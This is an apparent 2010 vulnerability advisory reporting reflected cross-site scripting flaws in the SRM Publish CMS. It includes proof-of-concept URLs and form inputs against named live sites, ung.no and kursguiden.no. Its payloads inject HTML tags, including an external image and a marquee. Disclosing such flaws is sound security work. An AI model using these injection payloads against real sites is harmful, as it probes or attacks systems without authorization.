___ ___________ __ ______
\ \/ / ____/ | \/ ___/
> < <_| | | /\___ \
/__/\_ \__ |____//____ >
\/ |__| \/
------------------------------------------------------------------------
Multiple XSS vulnerabilities in SRM Publish
------------------------------------------------------------------------
Author: Audun Larsen (larsen at xqus dot com)
Date: Jan 23, 2010
--AFFECTED SOFTWARE-----------------------------------------------------
Name: SRM Publish
SRM Publish is a CMS developed and maintained by the Norwegain company
"Mathisen IT Consult AS" and is used on sites like ung.no and
kursguiden.no.
--DISCUSSION------------------------------------------------------------
SRM Publish is vulnerable to many Non-Persistent (or reflected)
Cross-Site Scripting attacks. The problems exists because of the lack
of properly escaping user input before displaying it to the user.
--PROOF OF CONCEPT------------------------------------------------------
http://www.ung.no/sok.php?sok=%22%3E%3Cimg%20src= /
http://dl.dropbox.com/u/432933/av-14652.gif%3E%3Ca%20%22
------------------------------
http://www.ung.no/sok.php?sok=bli%20den%20du%20vil%3Cmarquee%3E
------------------------------
Enter any HTML code in the e-mail field at
http://www.kursguiden.no/kundeweb/?shw=glemtpassord
------------------------------
Enter the following in one of the textfields
">
here http://www.kursguiden.no/kundeweb/?shw=kontakt
or here http://www.kursguiden.no/kundeweb/?shw=nybruker
--TIMELINE--------------------------------------------------------------
Jan 23, 2010: Vulnerability discovered
Jan 23, 2010: srm@srm.no notified
--DISCLAIMER------------------------------------------------------------
The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
Copyright © 2010 Audun Larsen, some rights reserved:
http://creativecommons.org/licenses/by-sa/3.0/